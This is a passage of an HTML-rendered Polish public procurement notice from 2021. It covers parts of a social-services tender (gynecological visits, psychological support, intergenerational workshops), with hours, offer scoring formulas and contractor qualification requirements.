class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III: Usługi prozdrowotne z zakresu wsparcia lekarza ginekolog-położnik: dla minimum<br/>100 osób w zakresie wizyt lekarzy specjalistów dla osób potrzebujących zgłaszających się do<br/>Wydziału CUS Ds. Pomocy Środowiskowej i Organizowania Usług Społecznych do<br/>Koordynatora Indywidualnych Planów Usług Społecznych w wymiarze łącznym 200 godzin<br/>(godzin zegarowych po 60 min) tj: w podziale 75 godzin od dnia podpisania umowy do<br/>28.02.2022 r., 100 godzin od 01.03.2022 roku do 31.12.2022 roku, 25 godzin od 01.01.2023<br/>roku do 30.03.2023 roku </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-03-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1<br/>pkt 7 ustawy. Zamówienia będą polegały na zleceniu wykonawcy podobnych rodzajowo usług w<br/>zakresie prowadzenia usług psychologicznych oraz usług integracyjnych adekwatnych do przedmiotu<br/>zamówienia podstawowego do 50 % wartości zamówienia podstawowego w terminie do 3 lat od<br/>udzielenia zamówienie podstawowego. Warunki w zakresie terminów płatności będą określone na<br/>zasadach wynikających z projektowanych postanowień umownych załączonych do zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert - zamawiający uzna oferty za spełniające<br/>wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.1.oferta spełnia wymagania określone niniejszą specyfikacją,<br/>1.2.oferta została złożona, w określonym przez zamawiającego terminie,<br/>1.3. Wykonawca przedstawił ofertę zgodną co do treści z wymaganiami Zamawiającego.<br/>2. Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową<br/>zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków<br/>przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów<br/>ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru<br/>najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną<br/>punktację: punktacja 0-100 (100%=100pkt).<br/>4. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert<br/>przedstawione poniżej.Lp. Nazwa kryterium Waga kryterium<br/>1) Cena 60<br/>2) Dodatkowe doświadczenie 40<br/>5. Dodatkowe postanowienia dot. kryterium cena:<br/>Punkty w tym kryterium zostaną przyznane według wzoru:<br/>C = (C min/C o) x 60 pkt<br/>gdzie:<br/>C min- najniższa cena brutto z ocenianych ofert (zł)<br/>C o - cena brutto określona w ocenianej ofercie (zł)<br/>6. Dodatkowe postanowienia dot. kryterium Dodatkowe doświadczenie:<br/>Liczba punktów w kryterium Dodatkowe doświadczenie zostanie przyznana za dodatkowe<br/>doświadczenie osoby wskazanej do realizacji zamówienia w wykazie osób (wymagane doświadczenie<br/>minimum 2 lata):<br/>Kryterium<br/>Doświadczenie (D) 3 lata i więcej – 40 punktów Więcej niż 2 a mniej niż 3 lata – 20 punktów 2 lata –<br/>0 punktów<br/>W przypadku, gdy Wykonawca nie wypełni stosownego pola w formularzu ofertowym otrzyma w tym<br/>kryterium 0 punktów.<br/>Oferta Wykonawcy, który wskaże doświadczenie krótsze, niż 2 lata, zostanie odrzucona na podstawie<br/>art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>Wzór do obliczeń:<br/>Sp = C + D<br/>gdzie: Sp – Suma punktów przyznana wykonawcy w kryteriach: cena oferty, doświadczenie,<br/>C – ilość punktów przyznana w kryterium: cena oferty<br/>D- ilość punktów przyznana w kryterium: doświadczenie<br/>7. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma<br/>maksymalną liczbę punktów. Pozostałym wykonawcom, wypełniającym wymagania kryterialne<br/>przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie<br/>traktowany jako wartość punktowa oferty.<br/>8. Wynik - oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów<br/>w oparciu o ustalone kryteria) zostanie oceniona jako najkorzystniejsza, pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>Wykonawca, którego oferta zostanie oceniona jako najkorzystniejsza podlegać będzie badaniu czy nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu, zgodnie z Rozdziałem V ust. 5<br/>niniejszej Specyfikacji.<br/>9. Zamawiający dla potrzeb oceny oferty, której wybór prowadziłby do powstania u zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, doliczy do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z<br/>tymi przepisami.<br/>10. Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej w celu wyboru<br/>najkorzystniejszej spośród ofert uznanych za ważne.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część IV: Usługi psychologiczne. W ramach realizacji zamówienia do obowiązków<br/>Wykonawcy należy prowadzenie zajęć psychologicznych - indywidualnych oraz grupowych w<br/>Klubie Integracji Społecznej bez limitu osób. Wsparcie ma przede wszystkim na celu pomoc w<br/>rozwiązywaniu osobistych problemów uczestników związanych np. z sytuacją rodzinną,<br/>nieradzeniem sobie ze stresem i agresją, konfliktami, uzależnieniami, barierami w kontaktach<br/>interpersonalnych, niską samooceną oraz motywacją do podejmowania konstruktywnych<br/>działań. Udzielane wsparcie polegać powinno przede wszystkim na wzmocnieniu kompetencji<br/>społecznych uczestników projektu oraz zbudowaniu zaufania wobec grupy. W ramach wsparcia<br/>należy przeprowadzić zajęcia z zakresu integracji, komunikacji, negocjacji i rozwiązywania<br/>sytuacji konfliktowych. Ponadto w ramach warsztatów powinny zostać zorganizowane szkolenia<br/>kształtujące umiejętności radzenia sobie w trudnych sytuacjach życiowych (tj. problemy<br/>rodzinne, utrata zdrowia, utrata bliskiej osoby, utrata chęci życia, przemoc domowa, problemy<br/>alkoholowe, itp.) w celu podwyższenia samodzielności i zwiększenia szans na aktywność w<br/>życiu publicznym. Podczas zajęć uczestnicy powinni nauczyć się jak samemu radzić sobie w<br/>sytuacjach kryzysowych i/lub gdzie się skutecznie zwrócić o pomoc.<br/>Wykonawca jest obowiązany do zrealizowania usługi w wymiarze łącznym 1000 godzin, średnio<br/>40 godzin w miesiącu (godzin zegarowych po 60 min) tj: w podziale:<br/>a) 400 godzin od dnia podpisania umowy do 28.02.2022 r.,<br/>b) 480 godzin od 01.03.2022 roku do 31.12.2022 roku,<br/>c) 120 godzin od 01.01.2023 roku do 30.03.2023 roku </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-03-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1<br/>pkt 7 ustawy. Zamówienia będą polegały na zleceniu wykonawcy podobnych rodzajowo usług w<br/>zakresie prowadzenia usług psychologicznych oraz usług integracyjnych adekwatnych do przedmiotu<br/>zamówienia podstawowego do 50 % wartości zamówienia podstawowego w terminie do 3 lat od<br/>udzielenia zamówienie podstawowego. Warunki w zakresie terminów płatności będą określone na<br/>zasadach wynikających z projektowanych postanowień umownych załączonych do zamówienia<br/>Ogłoszenie nr 2021/BZP 00226400/01 z dnia 2021-10-08<br/>2021-10-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert - zamawiający uzna oferty za spełniające<br/>wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.1.oferta spełnia wymagania określone niniejszą specyfikacją,<br/>1.2.oferta została złożona, w określonym przez zamawiającego terminie,<br/>1.3. Wykonawca przedstawił ofertę zgodną co do treści z wymaganiami Zamawiającego.<br/>2. Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową<br/>zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków<br/>przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów<br/>ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru<br/>najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną<br/>punktację: punktacja 0-100 (100%=100pkt).<br/>4. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert<br/>przedstawione poniżej.Lp. Nazwa kryterium Waga kryterium<br/>1) Cena 60<br/>2) Dodatkowe doświadczenie 40<br/>5. Dodatkowe postanowienia dot. kryterium cena:<br/>Punkty w tym kryterium zostaną przyznane według wzoru:<br/>C = (C min/C o) x 60 pkt<br/>gdzie:<br/>C min- najniższa cena brutto z ocenianych ofert (zł)<br/>C o - cena brutto określona w ocenianej ofercie (zł)<br/>6. Dodatkowe postanowienia dot. kryterium Dodatkowe doświadczenie:<br/>Liczba punktów w kryterium Dodatkowe doświadczenie zostanie przyznana za dodatkowe<br/>doświadczenie osoby wskazanej do realizacji zamówienia w wykazie osób (wymagane doświadczenie<br/>minimum 2 lata):<br/>Kryterium<br/>Doświadczenie (D) 3 lata i więcej – 40 punktów Więcej niż 2 a mniej niż 3 lata – 20 punktów 2 lata –<br/>0 punktów<br/>W przypadku, gdy Wykonawca nie wypełni stosownego pola w formularzu ofertowym otrzyma w tym<br/>kryterium 0 punktów.<br/>Oferta Wykonawcy, który wskaże doświadczenie krótsze, niż 2 lata, zostanie odrzucona na podstawie<br/>art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>Wzór do obliczeń:<br/>Sp = C + D<br/>gdzie: Sp – Suma punktów przyznana wykonawcy w kryteriach: cena oferty, doświadczenie,<br/>C – ilość punktów przyznana w kryterium: cena oferty<br/>D- ilość punktów przyznana w kryterium: doświadczenie<br/>7. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma<br/>maksymalną liczbę punktów. Pozostałym wykonawcom, wypełniającym wymagania kryterialne<br/>przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie<br/>traktowany jako wartość punktowa oferty.<br/>8. Wynik - oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów<br/>w oparciu o ustalone kryteria) zostanie oceniona jako najkorzystniejsza, pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>Wykonawca, którego oferta zostanie oceniona jako najkorzystniejsza podlegać będzie badaniu czy nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu, zgodnie z Rozdziałem V ust. 5<br/>niniejszej Specyfikacji.<br/>9. Zamawiający dla potrzeb oceny oferty, której wybór prowadziłby do powstania u zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, doliczy do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z<br/>tymi przepisami.<br/>10. Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej w celu wyboru<br/>najkorzystniejszej spośród ofert uznanych za ważne.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część V: Usługi integracyjne o zakresie:<br/>W ramach realizacji zamówienia do obowiązków Wykonawcy należy prowadzenie warsztatów z<br/>integracji międzypokoleniowej na temat starości i starzenia się kierowanych do różnych grup<br/>wiekowych bez limitu osób. Wykonawca ma obowiązek prowadzić działania międzypokoleniowe<br/>z udziałem osób starszych na rzecz rozwoju wiedzy młodszych pokoleń, np. lekcje historii,<br/>pogadanki edukacyjne, itp. w wymiarze łącznym 375 godzin (godzin zegarowych po 60 min) tj: w<br/>podziale:<br/>a) 150 godzin od dnia podpisania umowy do 28.02.2022 r.,<br/>b) 180 godzin od 01.03.2022 roku do 31.12.2022 roku,<br/>c) 45 godzin od 01.01.2023 roku do 30.03.2023 roku </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-03-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1<br/>pkt 7 ustawy. Zamówienia będą polegały na zleceniu wykonawcy podobnych rodzajowo usług w<br/>Ogłoszenie nr 2021/BZP 00226400/01 z dnia 2021-10-08<br/>2021-10-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>zakresie prowadzenia usług psychologicznych oraz usług integracyjnych adekwatnych do przedmiotu<br/>zamówienia podstawowego do 50 % wartości zamówienia podstawowego w terminie do 3 lat od<br/>udzielenia zamówienie podstawowego. Warunki w zakresie terminów płatności będą określone na<br/>zasadach wynikających z projektowanych postanowień umownych załączonych do zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert - zamawiający uzna oferty za spełniające<br/>wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.1.oferta spełnia wymagania określone niniejszą specyfikacją,<br/>1.2.oferta została złożona, w określonym przez zamawiającego terminie,<br/>1.3. Wykonawca przedstawił ofertę zgodną co do treści z wymaganiami Zamawiającego.<br/>2. Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową<br/>zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków<br/>przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów<br/>ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru<br/>najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną<br/>punktację: punktacja 0-100 (100%=100pkt).<br/>4. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert<br/>przedstawione poniżej.Lp. Nazwa kryterium Waga kryterium<br/>1) Cena 60<br/>2) Dodatkowe doświadczenie 40<br/>5. Dodatkowe postanowienia dot. kryterium cena:<br/>Punkty w tym kryterium zostaną przyznane według wzoru:<br/>C = (C min/C o) x 60 pkt<br/>gdzie:<br/>C min- najniższa cena brutto z ocenianych ofert (zł)<br/>C o - cena brutto określona w ocenianej ofercie (zł)<br/>6. Dodatkowe postanowienia dot. kryterium Dodatkowe doświadczenie:<br/>Liczba punktów w kryterium Dodatkowe doświadczenie zostanie przyznana za dodatkowe<br/>doświadczenie osoby wskazanej do realizacji zamówienia w wykazie osób (wymagane doświadczenie<br/>minimum 2 lata):<br/>Kryterium<br/>Doświadczenie (D) 3 lata i więcej – 40 punktów Więcej niż 2 a mniej niż 3 lata – 20 punktów 2 lata –<br/>0 punktów<br/>W przypadku, gdy Wykonawca nie wypełni stosownego pola w formularzu ofertowym otrzyma w tym<br/>kryterium 0 punktów.<br/>Oferta Wykonawcy, który wskaże doświadczenie krótsze, niż 2 lata, zostanie odrzucona na podstawie<br/>art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>Wzór do obliczeń:<br/>Sp = C + D<br/>gdzie: Sp – Suma punktów przyznana wykonawcy w kryteriach: cena oferty, doświadczenie,<br/>C – ilość punktów przyznana w kryterium: cena oferty<br/>D- ilość punktów przyznana w kryterium: doświadczenie<br/>7. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma<br/>maksymalną liczbę punktów. Pozostałym wykonawcom, wypełniającym wymagania kryterialne<br/>przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie<br/>traktowany jako wartość punktowa oferty.<br/>8. Wynik - oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów<br/>w oparciu o ustalone kryteria) zostanie oceniona jako najkorzystniejsza, pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>Wykonawca, którego oferta zostanie oceniona jako najkorzystniejsza podlegać będzie badaniu czy nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu, zgodnie z Rozdziałem V ust. 5<br/>niniejszej Specyfikacji.<br/>9. Zamawiający dla potrzeb oceny oferty, której wybór prowadziłby do powstania u zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, doliczy do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z<br/>tymi przepisami.<br/>10. Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej w celu wyboru<br/>najkorzystniejszej spośród ofert uznanych za ważne.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy zgodnie z art. 57 ustawy Pzp, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu, o ile zostały one określone przez zamawiającego<br/>w ogłoszeniu o zamówieniu.<br/>2. Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia musi spełniać warunki<br/>udziału w postępowaniu dotyczące:<br/>1) Warunek zdolności do występowania w obrocie gospodarczym, zostanie uznany za spełniony,<br/>gdy Wykonawca wykaże, że:<br/>Zamawiający nie określa warunku w tym zakresie,<br/>Ogłoszenie nr 2021/BZP 00226400/01 z dnia 2021-10-08<br/>2021-10-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>2) warunek uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o<br/>ile wynika to z odrębnych przepisów, zostanie uznany za spełniony, gdy Wykonawca wykaże,<br/>że:<br/>Zamawiający nie określa warunku w tym zakresie,<br/>3) warunek sytuacji ekonomicznej lub finansowej, zostanie uznany za spełniony, gdy<br/>Wykonawca wykaże, że:<br/>Zamawiający nie określa warunku w tym zakresie,<br/>4) warunek zdolności technicznej lub zawodowej zostanie uznany za spełniony, gdy Wykonawca<br/>wykaże, że:<br/>a) Część I: Usługi prozdrowotne z zakresu wsparcia lekarza chorób wewnętrznych: Warunek<br/>zdolności technicznej lub zawodowej zostanie uznany za spełniony, gdy Wykonawca wykaże, że<br/>dysponuje co najmniej 1 osobą posiadającą co najmniej 2 letnie doświadczenie zawodowe oraz<br/>uprawnienia do wykonywania zawodu lekarza specjalisty w dziedzinie chorób wewnętrznych lub<br/>posiadającą specjalizację I stopnia w dziedzinie chorób wewnętrznych lub będącą w trakcie<br/>specjalizacji w dziedzinie chorób wewnętrznych.<br/>b) Część II: Usługi prozdrowotne z zakresu wsparcia lekarza psychiatry: Warunek zdolności<br/>technicznej lub zawodowej zostanie uznany za spełniony, gdy Wykonawca wykaże, że<br/>dysponuje co najmniej 1 osobą posiadającą co najmniej 2 letnie doświadczenie zawodowe oraz<br/>uprawnienia do wykonywania zawodu lekarza specjalisty w dziedzinie psychiatrii lub<br/>posiadającą specjalizację I stopnia w dziedzinie psychiatrii lub będącą w trakcie specjalizacji w<br/>dziedzinie psychiatrii.<br/>c) Część III: Usługi prozdrowotne z zakresu wsparcia lekarza ginekolog-położnik: Warunek<br/>zdolności technicznej lub zawodowej zostanie uznany za spełniony, gdy Wykonawca wykaże, że<br/>dysponuje co najmniej 1 osobą posiadającą co najmniej 2 letnie doświadczenie zawodowe oraz<br/>uprawnienia do wykonywania zawodu lekarza specjalisty w dziedzinie ginekologii-położnictwa<br/>lub posiadającą specjalizację I stopnia w dziedzinie ginekologii-położnictwa lub będącą w trakcie<br/>specjalizacji w dziedzinie ginekologii-położnictwa.<br/>d) Część IV: Usługi psychologiczne. Warunek zdolności technicznej lub zawodowej zostanie<br/>uznany za spełniony, gdy Wykonawca wykaże, że dysponuje co najmniej 2 osobami do<br/>prowadzenia zajęć posiadającymi prawo wykonywania zawodu psychologa, zgodnie z ustawą z<br/>dnia 8 czerwca 2001 r. o zawodzie psychologa i samorządzie zawodowym psychologów (Dz. U.<br/>z 2019 r. poz. 1026 ) i minimum 2 lata doświadczenia zawodowego.<br/>• Część V: Usługi integracyjne o zakresie: Warunek zdolności technicznej lub zawodowej<br/>zostanie uznany za spełniony, gdy Wykonawca wykaże, że dysponuje co najmniej 2 osobami do<br/>przeprowadzenia zajęć, przy czym osoby prowadzące zajęcia posiadają co najmniej<br/>wykształcenie wyższe oraz ukończone kursy zgodne z przedmiotem zamówienia tj. z zakresu<br/>integracji międzypokoleniowej potwierdzone certyfikatami/zaświadczeniami, oraz posiada co<br/>najmniej 2-letnie doświadczenie zawodowe w pracy w zakresie zgodnym z przedmiotem<br/>zamówienia<br/>Przez „min. 2-letnie doświadczenie zawodowe” rozumie się min. 24- miesięczne zaangażowanie<br/>w wykonywaniu obowiązków zawodowych.<br/>Udostępnienie zasobów:<br/>3. Zgodnie z ar. 118 ustawy Pzp Wykonawca może w celu potwierdzenia spełniania warunków<br/>udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do<br/>konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub<br/>zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>Ogłoszenie nr 2021/BZP 00226400/01 z dnia 2021-10-08<br/>2021-10-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>wymagane.<br/>5. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania stanowi załącznik nr 5<br/>do SWZ.<br/>6. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 5, potwierdza, że<br/>stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu 